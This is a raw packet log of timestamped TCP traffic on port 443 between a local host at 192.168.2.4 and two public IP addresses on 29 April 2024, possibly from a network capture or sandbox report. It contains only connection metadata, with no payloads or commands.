Apr 29, 2024 22:13:16.772537947 CEST	443	49758	40.127.169.103	192.168.2.4
Apr 29, 2024 22:13:16.772562981 CEST	49758	443	192.168.2.4	40.127.169.103
Apr 29, 2024 22:13:16.772581100 CEST	443	49758	40.127.169.103	192.168.2.4
Apr 29, 2024 22:13:16.772592068 CEST	443	49758	40.127.169.103	192.168.2.4
Apr 29, 2024 22:13:16.772612095 CEST	443	49758	40.127.169.103	192.168.2.4
Apr 29, 2024 22:13:16.772622108 CEST	443	49758	40.127.169.103	192.168.2.4
Apr 29, 2024 22:13:16.772622108 CEST	49758	443	192.168.2.4	40.127.169.103
Apr 29, 2024 22:13:16.772622108 CEST	49758	443	192.168.2.4	40.127.169.103
Apr 29, 2024 22:13:16.772644043 CEST	49758	443	192.168.2.4	40.127.169.103
Apr 29, 2024 22:13:16.772650957 CEST	443	49758	40.127.169.103	192.168.2.4
Apr 29, 2024 22:13:16.772665977 CEST	49758	443	192.168.2.4	40.127.169.103
Apr 29, 2024 22:13:16.772690058 CEST	49758	443	192.168.2.4	40.127.169.103
Apr 29, 2024 22:13:17.048007965 CEST	49758	443	192.168.2.4	40.127.169.103
Apr 29, 2024 22:13:17.048033953 CEST	443	49758	40.127.169.103	192.168.2.4
Apr 29, 2024 22:13:17.048046112 CEST	49758	443	192.168.2.4	40.127.169.103
Apr 29, 2024 22:13:17.048052073 CEST	443	49758	40.127.169.103	192.168.2.4
Apr 29, 2024 22:13:17.193645000 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:17.193681955 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:17.193943024 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:17.194197893 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:17.194212914 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:17.611651897 CEST	443	49759	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:17.611741066 CEST	443	49759	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:17.611825943 CEST	49759	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:17.611866951 CEST	49759	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:17.612746954 CEST	49759	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:17.612768888 CEST	443	49759	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:17.649498940 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:17.649569035 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:17.650067091 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:17.650078058 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:17.659671068 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:17.659677982 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:18.371042967 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:18.371067047 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:18.371082067 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:18.371299982 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:18.371360064 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:18.371427059 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:18.473973036 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:18.473994017 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:18.474061012 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:18.474098921 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:18.474114895 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:18.476850986 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:18.620254040 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:18.620317936 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:18.620450974 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:18.620450974 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:18.620467901 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:18.620882988 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:18.720429897 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:18.720451117 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:18.720525980 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:18.720566034 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:18.720577955 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:18.720607996 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:18.797804117 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:18.797832012 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:18.797920942 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:18.797945976 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:18.797959089 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:18.798650980 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:18.854468107 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:18.854490042 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:18.854587078 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:18.854605913 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:18.856935024 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:18.898163080 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:18.898231983 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:18.898292065 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:18.898310900 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:18.898367882 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:18.898386002 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:18.939224005 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:18.939268112 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:18.939316988 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:18.939332962 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:18.939348936 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:18.939376116 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:18.982731104 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:18.982778072 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:18.982947111 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:18.982947111 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:18.982959032 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:18.985224009 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.025998116 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.026045084 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.026101112 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.026118040 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.026158094 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.026166916 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.063419104 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.063469887 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.063499928 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.063509941 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.063561916 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.063561916 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.089582920 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.089601994 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.089673042 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.089688063 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.089730978 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.115003109 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.115020037 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.115082979 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.115096092 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.115148067 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.136630058 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.136646032 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.136699915 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.136709929 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.136739016 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.136748075 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.158581972 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.158597946 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.158652067 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.158670902 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.158693075 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.158713102 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.181282997 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.181301117 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.181368113 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.181377888 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.181410074 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.181418896 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.200345039 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.200367928 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.200407028 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.200417042 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.200467110 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.200486898 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.217360020 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.217376947 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.217421055 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.217432022 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.217462063 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.217479944 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.234934092 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.234952927 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.235143900 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.235155106 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.235244036 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.253196955 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.253215075 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.253262997 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.253273964 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.253299952 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.253319025 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.266793966 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.266817093 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.266866922 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.266880989 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.266913891 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.266927958 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.283935070 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.283951044 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.284002066 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.284015894 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.284034967 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.284059048 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.297359943 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.297377110 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.297420979 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.297430992 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.297442913 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.297472954 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.313064098 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.313086033 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.313128948 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.313138962 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.313169956 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.313184977 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.326839924 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.326864004 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.326940060 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.326940060 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.326948881 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.326987982 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.339183092 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.339198112 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.339245081 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.339256048 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.339283943 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.339302063 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.353488922 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.353511095 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.353549957 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.353559971 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.353591919 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.353611946 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.364511013 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.364535093 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.364579916 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.364592075 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.364624023 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.364634991 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.376492977 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.376509905 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.376560926 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.376573086 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.376595020 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.376615047 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.387340069 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.387356997 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.387398958 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.387411118 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.387439013 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.387449980 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.399071932 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.399089098 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.399149895 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.399161100 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.399189949 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.399209023 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.408891916 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.408910036 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.408967972 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.408977985 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.409008026 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.409019947 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.419090986 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.419107914 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.419184923 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.419194937 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.419236898 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.428493023 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.428508043 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.428590059 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.428599119 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.428644896 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.438787937 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.438803911 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.438874960 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.438889027 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.438930988 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.447160959 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.447177887 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.447246075 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.447254896 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.447300911 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.456125021 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.456141949 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.456185102 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.456193924 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.456228971 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.456238031 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.465471029 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.465486050 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.465532064 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.465538979 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.465574980 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.465594053 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.473247051 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.473263025 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.473329067 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.473341942 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.473381042 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.482100964 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.482119083 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.482182026 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.482191086 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.482219934 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.482229948 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.488744974 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.488763094 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.488816023 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.488823891 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.488853931 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.488864899 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.495857000 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.495910883 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.495934963 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.495940924 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.495978117 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.495991945 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.502923965 CEST	49764	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.502942085 CEST	443	49764	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.706945896 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.707000971 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:19.707081079 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.707302094 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:19.707318068 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:20.178237915 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:20.178399086 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:20.178814888 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:20.178828955 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:20.178977013 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:20.178983927 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:20.924570084 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:20.924595118 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:20.924609900 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:20.924673080 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:20.924695969 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:20.924714088 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:20.924748898 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:21.030057907 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:21.030078888 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:21.030234098 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:21.030245066 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:21.030294895 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:21.182212114 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:21.182231903 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:21.182305098 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:21.182316065 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:21.182363987 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:21.286868095 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:21.286890984 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:21.287013054 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:21.287025928 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:21.287081003 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:21.367475986 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:21.367495060 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:21.367598057 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:21.367609024 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:21.367661953 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:21.424595118 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:21.424609900 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:21.424863100 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:21.424870968 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:21.424926043 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:21.471278906 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:21.471297026 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:21.471371889 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:21.471380949 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:21.471424103 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:21.515937090 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:21.515953064 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:21.516035080 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:21.516050100 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:21.516089916 CEST	49766	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:21.559819937 CEST	443	49766	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:21.559844017 CEST	443	49766	95.217.242.142	192.168.2.4
